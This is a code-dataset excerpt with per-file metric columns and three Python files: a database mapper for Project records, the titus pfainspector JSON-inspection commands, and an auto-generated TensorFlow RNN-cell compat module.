| 45
| 1
| 45
| 45
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a2d00de25998c8e4c3213d35dd273d9891b55336
| 19,304
|
py
|
Python
|
src/server/db/ProjectMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
src/server/db/ProjectMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
src/server/db/ProjectMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
from server.bo.Project import Project
from server.db.Mapper import Mapper
class ProjectMapper(Mapper):
    """Mapper class that maps Project objects to a relational database.

    Provides methods to search for, create, modify and delete Project
    records.  The mapping is bidirectional: Project objects are converted
    into database rows and database rows back into objects.
    """

    def __init__(self):
        super().__init__()

    @staticmethod
    def _project_from_row(row):
        """Build a Project business object from one row of the Project table.

        The unpacking order below must match the column order of the
        Project table, which is what ``SELECT *`` returns.

        :param row: one tuple as returned by cursor.fetchall()
        :return: a fully populated Project object
        """
        (id_, creation_date, name, short_description, special_room,
         room_desired, num_blockdays_prior_lecture,
         date_blockdays_during_lecture, num_blockdays_during_lecture,
         num_blockdays_in_exam, weekly, num_spots, language,
         external_partner, edv_number, projecttype_id, module_id,
         professor_id, add_professor_id, current_state_id) = row
        project = Project()
        project.set_id(id_)
        project.set_date(creation_date)
        project.set_name(name)
        project.set_short_description(short_description)
        project.set_special_room(special_room)
        project.set_room_desired(room_desired)
        project.set_num_blockdays_prior_lecture(num_blockdays_prior_lecture)
        project.set_date_blockdays_during_lecture(date_blockdays_during_lecture)
        project.set_num_blockdays_during_lecture(num_blockdays_during_lecture)
        project.set_num_blockdays_in_exam(num_blockdays_in_exam)
        project.set_weekly(weekly)
        project.set_num_spots(num_spots)
        project.set_language(language)
        project.set_external_partner(external_partner)
        project.set_edv_number(edv_number)
        project.set_projecttype_id(projecttype_id)
        project.set_module_id(module_id)
        project.set_professor_id(professor_id)
        project.set_add_professor_id(add_professor_id)
        project.set_state(current_state_id)
        return project

    def _query_projects(self, command, params=None):
        """Execute a SELECT and map every result row to a Project object.

        :param command: SQL text, optionally containing %s placeholders
        :param params: tuple of values bound to the placeholders, or None
        :return: list of Project objects (possibly empty)
        """
        cursor = self._connection.cursor()
        if params is None:
            cursor.execute(command)
        else:
            # Parameterized execution lets the driver escape the values,
            # preventing SQL injection (the previous str.format() calls
            # interpolated raw user input into the statement).
            cursor.execute(command, params)
        result = [self._project_from_row(row) for row in cursor.fetchall()]
        self._connection.commit()
        cursor.close()
        return result

    def find_all(self):
        """Read out all projects.

        :return: a list of Project objects representing every project."""
        return self._query_projects("SELECT * FROM Project")

    def find_by_id(self, id):
        """Read out one project based on its id.

        :param id: primary key of the project
        :return: the matching Project object, or None if no row matches."""
        projects = self._query_projects(
            "SELECT * FROM Project WHERE id=%s", (id,))
        # Keep the original "last match wins" behavior; with a unique id
        # at most one row is returned anyway.
        return projects[-1] if projects else None

    def find_project_by_name(self, name):
        """Read out all projects whose name matches a LIKE pattern.

        :param name: SQL LIKE pattern (may contain % wildcards)
        :return: list of Project objects ordered by name."""
        return self._query_projects(
            "SELECT * FROM Project WHERE name LIKE %s ORDER BY name", (name,))

    def insert(self, project):
        """Insert a Project object into the database.

        The primary key of the given object is checked and corrected if
        necessary before inserting.

        :param project: the object to be saved
        :return: the same object, with a possibly corrected id.
        """
        cursor = self._connection.cursor()
        # NOTE(review): MAX(id)+1 is not safe under concurrent inserts; an
        # AUTO_INCREMENT column would be the robust fix. Kept as-is so the
        # table schema does not have to change.
        cursor.execute("SELECT MAX(id) AS maxid FROM Project")
        row = cursor.fetchone()
        if row is not None and row[0] is not None:
            # A maximum id exists: continue the sequence.
            project.set_id(row[0] + 1)
        else:
            # Empty table: start numbering at 1.
            project.set_id(1)
        command = ("INSERT INTO Project (id, creation_date, name, short_description, "
                   "special_room, room_desired, num_blockdays_prior_lecture, "
                   "date_blockdays_during_lecture, num_blockdays_during_lecture, "
                   "num_blockdays_in_exam, weekly, num_spots, language, "
                   "external_partner, edv_number, projecttype_id, module_id, "
                   "professor_id, add_professor_id, current_state_id) "
                   "VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)")
        data = (project.get_id(),
                project.get_date(),
                project.get_name(),
                project.get_short_description(),
                project.get_special_room(),
                project.get_room_desired(),
                project.get_num_blockdays_prior_lecture(),
                project.get_date_blockdays_during_lecture(),
                project.get_num_blockdays_during_lecture(),
                project.get_num_blockdays_in_exam(),
                project.get_weekly(),
                project.get_num_spots(),
                project.get_language(),
                project.get_external_partner(),
                project.get_edv_number(),
                project.get_projecttype_id(),
                project.get_module_id(),
                project.get_professor_id(),
                project.get_add_professor_id(),
                project.get_state())
        cursor.execute(command, data)
        self._connection.commit()
        cursor.close()
        return project

    def delete(self, project):
        """Delete the row belonging to a Project object from the database.

        :param project: the object whose row is to be removed
        :return: the (unchanged) project object."""
        cursor = self._connection.cursor()
        cursor.execute("DELETE FROM Project WHERE id=%s", (project.get_id(),))
        self._connection.commit()
        cursor.close()
        return project

    def update(self, project):
        """Write the current state of a Project object back to the database.

        :param project: the object to be written into the DB
        """
        cursor = self._connection.cursor()
        command = ("UPDATE Project SET name=%s, short_description=%s, special_room=%s, "
                   "room_desired=%s, num_blockdays_prior_lecture=%s, "
                   "date_blockdays_during_lecture=%s, num_blockdays_during_lecture=%s, "
                   "num_blockdays_in_exam=%s, weekly=%s, num_spots=%s, "
                   "language=%s, external_partner=%s, edv_number=%s, projecttype_id=%s, "
                   "module_id=%s, professor_id=%s, add_professor_id=%s, "
                   "current_state_id=%s WHERE id=%s")
        data = (project.get_name(),
                project.get_short_description(),
                project.get_special_room(),
                project.get_room_desired(),
                project.get_num_blockdays_prior_lecture(),
                project.get_date_blockdays_during_lecture(),
                project.get_num_blockdays_during_lecture(),
                project.get_num_blockdays_in_exam(),
                project.get_weekly(),
                project.get_num_spots(),
                project.get_language(),
                project.get_external_partner(),
                project.get_edv_number(),
                project.get_projecttype_id(),
                project.get_module_id(),
                project.get_professor_id(),
                project.get_add_professor_id(),
                project.get_state(),
                project.get_id())
        cursor.execute(command, data)
        self._connection.commit()
        cursor.close()

    def find_project_by_professor_id(self, professor_id):
        """Read out all projects supervised by a given professor.

        :param professor_id: id of the supervising professor
        :return: list of matching Project objects."""
        return self._query_projects(
            "SELECT * FROM Project WHERE professor_id=%s", (professor_id,))

    def find_project_by_projecttype_id(self, projecttype_id):
        """Read out all projects of a given project type.

        :param projecttype_id: id of the project type
        :return: list of matching Project objects."""
        return self._query_projects(
            "SELECT * FROM Project WHERE projecttype_id=%s", (projecttype_id,))

    def find_project_by_state(self, state):
        """Read out all projects in a given state.

        :param state: id of the current state
        :return: list of matching Project objects."""
        return self._query_projects(
            "SELECT * FROM Project WHERE current_state_id=%s", (state,))

    def get_project_by_module(self, module_id):
        """Read out all projects belonging to a given module.

        :param module_id: id of the module
        :return: list of matching Project objects."""
        return self._query_projects(
            "SELECT * FROM Project WHERE module_id=%s", (module_id,))
| 45.314554
| 173
| 0.646964
| 2,220
| 19,304
| 5.236486
| 0.068919
| 0.123011
| 0.094624
| 0.051613
| 0.855656
| 0.852903
| 0.838796
| 0.820645
| 0.805505
| 0.791312
| 0
| 0.000433
| 0.281962
| 19,304
| 425
| 174
| 45.421176
| 0.838251
| 0.073663
| 0
| 0.858491
| 0
| 0.012579
| 0.021647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034591
| false
| 0
| 0.006289
| 0
| 0.072327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a2ec0beb259e571e9cf2096d1bb34873a321d4b6
| 24,363
|
py
|
Python
|
titus/titus/inspector/jsongadget.py
|
jmilleralpine/hadrian
|
6a438e0370487bbbac5e64a4d6d7a2728902d153
|
[
"Apache-2.0"
] | 127
|
2015-08-05T17:08:35.000Z
|
2019-10-17T07:07:08.000Z
|
titus/titus/inspector/jsongadget.py
|
jmilleralpine/hadrian
|
6a438e0370487bbbac5e64a4d6d7a2728902d153
|
[
"Apache-2.0"
] | 54
|
2015-11-20T02:21:29.000Z
|
2019-11-23T20:17:23.000Z
|
titus/titus/inspector/jsongadget.py
|
jmilleralpine/hadrian
|
6a438e0370487bbbac5e64a4d6d7a2728902d153
|
[
"Apache-2.0"
] | 58
|
2015-05-27T18:19:29.000Z
|
2019-05-23T12:37:17.000Z
|
#!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import StringIO
import titus.producer.tools as t
from titus.inspector.defs import *
def depthGreaterThan(obj, target):
    """Helper function for determining if an object's depth is greater than a given target.

    A string, number, boolean, or null has depth 0; a list or dict of such
    objects has depth 1, and so on.  An empty list or dict still counts as
    depth 1.

    :type obj: Pythonized JSON
    :param obj: object to inspect
    :type target: non-negative integer
    :param target: target depth
    :rtype: bool
    :return: ``True`` if the depth of ``obj`` is greater than ``target``; ``False`` otherwise.
    """
    # Scalars terminate the recursion: their depth is 0, so they exceed
    # the target only if the (decremented) target has gone negative.
    if isinstance(obj, dict):
        children = list(obj.values())
    elif isinstance(obj, (list, tuple)):
        children = list(obj)
    else:
        return target < 0
    if not children:
        # An empty container has depth exactly 1.
        return target <= 0
    return any(depthGreaterThan(child, target - 1) for child in children)
class LookCommand(Command):
    """The 'json look' command in pfainspector."""

    def __init__(self, mode):
        """Store command metadata and the inspector mode that owns it.

        :type mode: titus.inspector.defs.Mode
        :param mode: the pfainspector mode holding the loaded PFA documents
        """
        self.name = "look"
        self.syntax = "look <name> [maxDepth=8] [indexWidth=30]"
        self.help = "look at a named PFA document or subexpression in memory\n " + self.syntax
        self.mode = mode

    def complete(self, established, active):
        """Handle tab-complete for this command's arguments.

        :type established: string
        :param established: part of the text that has been established
        :type active: string
        :param active: part of the text to be completed
        :rtype: list of strings
        :return: potential completions
        """
        options = ["maxDepth=", "indexWidth="]
        words = getcomplete(established)
        if len(words) == 0:
            # First argument: complete against the names of loaded documents.
            if active in self.mode.pfaFiles:
                return [active + "["]
            else:
                return sorted(x for x in self.mode.pfaFiles if x.startswith(active))
        elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
            # Mid-way through a subscript like name[...]: complete the path
            # inside the named document.
            if words[0].text in self.mode.pfaFiles:
                return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
            else:
                return []
        elif not words[-1].partial:
            # Document chosen; offer the option keywords.
            return [x for x in options if x.startswith(active)]
        else:
            return []

    def action(self, args):
        """Perform the action associated with this command.

        :type args: list of titus.inspector.parser.Ast
        :param args: arguments passed to the command
        :rtype: ``None``
        :return: nothing; results must be printed to the screen
        """
        if len(args) == 1 and args[0] == parser.Word("help"):
            print self.help
        else:
            options = {"maxDepth": 8, "indexWidth": 30}
            # Pop trailing key=value options off the argument list.
            while len(args) > 0 and isinstance(args[-1], parser.Option):
                opt = args.pop()
                if opt.word.text in ["maxDepth", "indexWidth"]:
                    try:
                        options[opt.word.text] = opt.value.value()
                    except TypeError:
                        raise InspectorError("illegal value for {0}".format(opt.word.text))
                else:
                    raise InspectorError("option {0} unrecognized".format(opt.word.text))
            if not isinstance(options["maxDepth"], (int, long)) or options["maxDepth"] <= 0:
                raise InspectorError("maxDepth must be a positive integer")
            if not isinstance(options["indexWidth"], (int, long)) or options["indexWidth"] <= 0:
                raise InspectorError("indexWidth must be a positive integer")
            # Resolve the remaining argument to a node: either a whole
            # document (Word) or a subexpression path (Extract).
            if len(args) == 1 and isinstance(args[0], parser.Word):
                if args[0].text not in self.mode.pfaFiles:
                    raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
                node = self.mode.pfaFiles[args[0].text].obj
            elif len(args) == 1 and isinstance(args[0], parser.Extract):
                if args[0].text not in self.mode.pfaFiles:
                    raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
                node = self.mode.pfaFiles[args[0].text].obj
                items = args[0].items
                node = extaction(args[0], node, items)
            else:
                self.syntaxError()
            if not depthGreaterThan(node, 0):
                # Scalar: just dump it, no tabular layout needed.
                print json.dumps(node)
            else:
                content = StringIO.StringIO()
                # Choose how much structure to inline based on how deeply
                # the node nests (shallow nodes can be shown more inline).
                if not depthGreaterThan(node, 1):
                    t.look(node, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=0, stream=content)
                elif not depthGreaterThan(node, 2):
                    t.look(node, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=1, stream=content)
                else:
                    t.look(node, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=2, stream=content)
                content = content.getvalue()
                if content.count("\n") <= 100:
                    print content
                else:
                    # Long output: page it through 'less'; a broken pipe just
                    # means the user quit the pager early, which is fine.
                    proc = pipe("less")
                    try:
                        proc.stdin.write(content)
                    except IOError as err:
                        if str(err) != "[Errno 32] Broken pipe":
                            raise
                    pipewait(proc)
class CountCommand(Command):
"""The 'json count' command in pfainspector."""
def __init__(self, mode):
self.name = "count"
self.syntax = "count <name> <pattern>"
self.help = "count instances in a PFA document or subexpression that match a regular expression\n " + self.syntax
self.mode = mode
def complete(self, established, active):
"""Handle tab-complete for this command's arguments.
:type established: string
:param established: part of the text that has been established
:type active: string
:param active: part of the text to be completed
:rtype: list of strings
:return: potential completions
"""
words = getcomplete(established)
if len(words) == 0:
if active in self.mode.pfaFiles:
return [active + "["]
else:
return sorted(x for x in self.mode.pfaFiles.keys() if x.startswith(active))
elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
if words[0].text in self.mode.pfaFiles:
return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
else:
return []
else:
return []
def action(self, args):
"""Perform the action associated with this command.
:type args: list of titus.inspector.parser.Ast
:param args: arguments passed to the command
:rtype: ``None``
:return: nothing; results must be printed to the screen
"""
if len(args) == 1 and args[0] == parser.Word("help"):
print self.help
else:
if len(args) == 2 and isinstance(args[0], parser.Word):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
elif len(args) == 2 and isinstance(args[0], parser.Extract):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
items = args[0].items
node = extaction(args[0], node, items)
else:
self.syntaxError()
regex = args[-1].regex()
print "{0} matches".format(t.count(regex, node))
class IndexCommand(Command):
"""The 'json index' command in pfainspector."""
def __init__(self, mode):
self.name = "index"
self.syntax = "index <name> <pattern>"
self.help = "list indexes of a PFA document or subexpression that match a regular expression\n " + self.syntax
self.mode = mode
def complete(self, established, active):
"""Handle tab-complete for this command's arguments.
:type established: string
:param established: part of the text that has been established
:type active: string
:param active: part of the text to be completed
:rtype: list of strings
:return: potential completions
"""
words = getcomplete(established)
if len(words) == 0:
if active in self.mode.pfaFiles:
return [active + "["]
else:
return sorted(x for x in self.mode.pfaFiles.keys() if x.startswith(active))
elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
if words[0].text in self.mode.pfaFiles:
return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
else:
return []
else:
return []
def action(self, args):
"""Perform the action associated with this command.
:type args: list of titus.inspector.parser.Ast
:param args: arguments passed to the command
:rtype: ``None``
:return: nothing; results must be printed to the screen
"""
if len(args) == 1 and args[0] == parser.Word("help"):
print self.help
else:
if len(args) == 2 and isinstance(args[0], parser.Word):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
elif len(args) == 2 and isinstance(args[0], parser.Extract):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
items = args[0].items
node = extaction(args[0], node, items)
else:
self.syntaxError()
regex = args[-1].regex()
def display(i):
if isinstance(i, basestring):
if " " in i:
return json.dumps(i)
else:
return i
else:
return str(i)
print "Indexes that match the pattern:"
count = 0
for index in t.indexes(regex, node):
print " [" + ", ".join(display(i) for i in index) + "]"
count += 1
if count == 0:
print " (none)"
class FindCommand(Command):
"""The 'json find' command in pfainspector."""
def __init__(self, mode):
self.name = "find"
self.syntax = "find <name> <pattern> [maxDepth=3] [indexWidth=30]"
self.help = "show all matches of a regular expression in a PFA document or subexpression\n " + self.syntax
self.mode = mode
def complete(self, established, active):
"""Handle tab-complete for this command's arguments.
:type established: string
:param established: part of the text that has been established
:type active: string
:param active: part of the text to be completed
:rtype: list of strings
:return: potential completions
"""
options = ["maxDepth=", "indexWidth="]
words = getcomplete(established)
if len(words) == 0:
if active in self.mode.pfaFiles:
return [active + "["]
else:
return sorted(x for x in self.mode.pfaFiles if x.startswith(active))
elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
if words[0].text in self.mode.pfaFiles:
return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
else:
return []
elif not words[-1].partial:
return [x for x in options if x.startswith(active)]
else:
return []
def action(self, args):
"""Perform the action associated with this command.
:type args: list of titus.inspector.parser.Ast
:param args: arguments passed to the command
:rtype: ``None``
:return: nothing; results must be printed to the screen
"""
if len(args) == 1 and args[0] == parser.Word("help"):
print self.help
else:
options = {"maxDepth": 3, "indexWidth": 30}
while len(args) > 0 and isinstance(args[-1], parser.Option):
opt = args.pop()
if opt.word.text in ["maxDepth", "indexWidth"]:
try:
options[opt.word.text] = opt.value.value()
except TypeError:
raise InspectorError("illegal value for {0}".format(opt.word.text))
else:
raise InspectorError("option {1} unrecognized".format(opt.word.text))
if not isinstance(options["maxDepth"], (int, long)) or options["maxDepth"] <= 0:
raise InspectorError("maxDepth must be a positive integer")
if not isinstance(options["indexWidth"], (int, long)) or options["indexWidth"] <= 0:
raise InspectorError("indexWidth must be a positive integer")
if len(args) == 2 and isinstance(args[0], parser.Word):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
elif len(args) == 2 and isinstance(args[0], parser.Extract):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
items = args[0].items
node = extaction(args[0], node, items)
else:
self.syntaxError()
regex = args[-1].regex()
def display(i):
if isinstance(i, basestring):
if " " in i:
return json.dumps(i)
else:
return i
else:
return str(i)
content = StringIO.StringIO()
count = 0
for index in t.indexes(regex, node):
content.write("At index [" + ", ".join(display(i) for i in index) + "]:\n")
matched = t.get(node, index)
if not depthGreaterThan(matched, 0):
content.write(json.dumps(matched) + "\n")
elif not depthGreaterThan(matched, 1):
t.look(matched, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=0, stream=content)
elif not depthGreaterThan(matched, 2):
t.look(matched, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=1, stream=content)
else:
t.look(matched, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=2, stream=content)
content.write("\n")
count += 1
if count == 0:
print " (none)"
content = content.getvalue()
if content.count("\n") <= 100:
print content
else:
proc = pipe("less")
try:
proc.stdin.write(content)
except IOError as err:
if str(err) != "[Errno 32] Broken pipe":
raise
pipewait(proc)
class ChangeCommand(Command):
    """The 'json change' command in pfainspector."""
    def __init__(self, mode):
        self.name = "change"
        self.syntax = "change <name> <pattern> to <replacement>"
        self.help = "replace instances in a PFA document or subexpression that match a regular expression\n    " + self.syntax
        self.mode = mode
    def complete(self, established, active):
        """Handle tab-complete for this command's arguments.

        :type established: string
        :param established: part of the text that has been established
        :type active: string
        :param active: part of the text to be completed
        :rtype: list of strings
        :return: potential completions
        """
        words = getcomplete(established)
        if len(words) == 0:
            # completing the document name itself
            if active in self.mode.pfaFiles:
                return [active + "["]
            else:
                return sorted(x for x in self.mode.pfaFiles.keys() if x.startswith(active))
        elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
            # completing an extraction path into a loaded document
            if words[0].text in self.mode.pfaFiles:
                return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
            else:
                return []
        elif len(words) == 2 and isinstance(words[0], (parser.Word, parser.Extract)) and words[0].text in self.mode.pfaFiles:
            # document and pattern given: the keyword 'to' must come next
            return ["to "]
        else:
            return []
    def action(self, args):
        """Perform the action associated with this command.

        :type args: list of titus.inspector.parser.Ast
        :param args: arguments passed to the command
        :rtype: ``None``
        :return: nothing; results must be printed to the screen
        """
        if len(args) == 1 and args[0] == parser.Word("help"):
            print self.help
        else:
            if len(args) == 4 and isinstance(args[0], parser.Word):
                # change over a whole document: change <name> <pattern> to <replacement>
                if args[0].text not in self.mode.pfaFiles:
                    raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
                model = self.mode.pfaFiles[args[0].text]
                node = model.obj
                # deep copy so 'revert' (or an exception) can restore the document
                safecopy = copy.deepcopy(node)
                def rollback():
                    # restore the pre-change document object
                    self.mode.pfaFiles[args[0].text].obj = safecopy
                regex = args[1].regex()
                replacement = args[3].replacement()
            elif len(args) == 4 and isinstance(args[0], parser.Extract):
                # change over a subexpression extracted from a document
                if args[0].text not in self.mode.pfaFiles:
                    raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
                model = self.mode.pfaFiles[args[0].text]
                node = model.obj
                # deep copy of the WHOLE document (not just the subexpression) for rollback
                safecopy = copy.deepcopy(node)
                def rollback():
                    # restore the pre-change document object
                    self.mode.pfaFiles[args[0].text].obj = safecopy
                items = args[0].items
                node = extaction(args[0], node, items)
                regex = args[1].regex()
                replacement = args[3].replacement()
            else:
                self.syntaxError()
            def display(i):
                # quote strings that contain spaces so index elements stay unambiguous
                if isinstance(i, basestring):
                    if " " in i:
                        return json.dumps(i)
                    else:
                        return i
                else:
                    return str(i)
            def replace(value, groups):
                # recursively substitute parser.Replacement placeholders with the
                # named groups captured by the regex match
                if isinstance(value, parser.Replacement):
                    try:
                        return groups[value.name]
                    except KeyError:
                        raise InspectorError("group ({0}) not found in regular expression".format(value.name))
                elif isinstance(value, dict):
                    return dict((k, replace(v, groups)) for k, v in value.items())
                elif isinstance(value, (list, tuple)):
                    return [replace(x, groups) for x in value]
                else:
                    return value
            def removeAts(obj):
                # strip "@" bookkeeping keys before showing JSON to the user
                if isinstance(obj, dict):
                    return dict((k, removeAts(v)) for k, v in obj.items() if k != "@")
                elif isinstance(obj, (list, tuple)):
                    return [removeAts(x) for x in obj]
                else:
                    return obj
            ask = True  # prompt per match until the user answers "all"
            self.mode.pause()
            try:
                for index, match in t.search(regex, node):
                    replacedReplacement = replace(replacement, match.groups)
                    if ask:
                        print "At index [" + ", ".join(display(i) for i in index) + "]:"
                        print "Original: " + json.dumps(removeAts(t.get(node, index)))
                        print "Change to: " + json.dumps(replacedReplacement)
                        action = None
                        while action is None:
                            response = raw_input("(Y/n/all/stop/revert): ")
                            normalized = response.strip().lower()
                            if normalized in ("", "y", "yes"):
                                action = "yes"
                            elif normalized in ("n", "no"):
                                action = "no"
                            elif normalized == "all":
                                action = "all"
                            elif normalized == "stop":
                                action = "stop"
                            elif normalized == "revert":
                                action = "revert"
                                print
                            else:
                                # NOTE(review): any unrecognized response is treated as
                                # "yes" — confirm this is intended; re-prompting (leaving
                                # action as None) would be the safer behavior
                                action = "yes"
                    if action == "yes":
                        t.assign(node, index, replacedReplacement)
                    elif action == "all":
                        # apply this and all remaining matches without prompting
                        t.assign(node, index, replacedReplacement)
                        ask = False
                    elif action == "stop":
                        # keep changes made so far, abandon the rest
                        break
                    elif action == "revert":
                        # discard every change made during this command
                        rollback()
                        break
            except:
                # on any failure (including KeyboardInterrupt) restore the document,
                # resume the mode, and re-raise
                rollback()
                self.mode.resume()
                raise
            else:
                model.reset()
                self.mode.resume()
class JsonGadget(Gadget):
    """The 'json' gadget in pfainspector."""

    def __init__(self, mode):
        # instantiate every json subcommand against the same mode
        commandClasses = (LookCommand, CountCommand, IndexCommand, FindCommand, ChangeCommand)
        self.commandGroup = CommandGroup("json", [commandClass(mode) for commandClass in commandClasses])
| 40.136738
| 145
| 0.531092
| 2,772
| 24,363
| 4.65873
| 0.106061
| 0.026715
| 0.053276
| 0.03624
| 0.766765
| 0.754762
| 0.748025
| 0.737184
| 0.727195
| 0.700403
| 0
| 0.014049
| 0.357263
| 24,363
| 606
| 146
| 40.20297
| 0.810652
| 0.030374
| 0
| 0.722922
| 0
| 0
| 0.103654
| 0.001103
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.012594
| null | null | 0.042821
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0c412899c03b81c1f041a7664177a8afb9f2893e
| 1,198
|
py
|
Python
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/nn/rnn_cell/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 2
|
2019-08-04T20:28:14.000Z
|
2019-10-27T23:26:42.000Z
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/nn/rnn_cell/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | null | null | null |
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/nn/rnn_cell/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 1
|
2020-11-04T03:16:29.000Z
|
2020-11-04T03:16:29.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Module for constructing RNN Cells.
"""

from __future__ import print_function as _print_function

import sys as _sys

# Re-export the public RNN-cell classes under the compat.v1.nn.rnn_cell namespace.
from tensorflow.python.ops.rnn_cell_impl import BasicLSTMCell
from tensorflow.python.ops.rnn_cell_impl import BasicRNNCell
from tensorflow.python.ops.rnn_cell_impl import DeviceWrapper
from tensorflow.python.ops.rnn_cell_impl import DropoutWrapper
from tensorflow.python.ops.rnn_cell_impl import GRUCell
from tensorflow.python.ops.rnn_cell_impl import LSTMCell
from tensorflow.python.ops.rnn_cell_impl import LSTMStateTuple
from tensorflow.python.ops.rnn_cell_impl import MultiRNNCell
from tensorflow.python.ops.rnn_cell_impl import RNNCell
from tensorflow.python.ops.rnn_cell_impl import ResidualWrapper

del _print_function

from tensorflow.python.util import module_wrapper as _module_wrapper

# Replace this module object in sys.modules with a TFModuleWrapper so that
# attribute access can be intercepted (the wrapper is created with
# deprecation=False, so no deprecation warnings are attached here).
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
    _sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
        _sys.modules[__name__], "compat.v1.nn.rnn_cell", public_apis=None, deprecation=False,
        has_lite=False)
| 41.310345
| 91
| 0.840568
| 171
| 1,198
| 5.555556
| 0.350877
| 0.202105
| 0.231579
| 0.242105
| 0.524211
| 0.524211
| 0.524211
| 0.524211
| 0.103158
| 0
| 0
| 0.000919
| 0.09182
| 1,198
| 28
| 92
| 42.785714
| 0.872243
| 0.134391
| 0
| 0
| 1
| 0
| 0.020408
| 0.020408
| 0
| 0
| 0
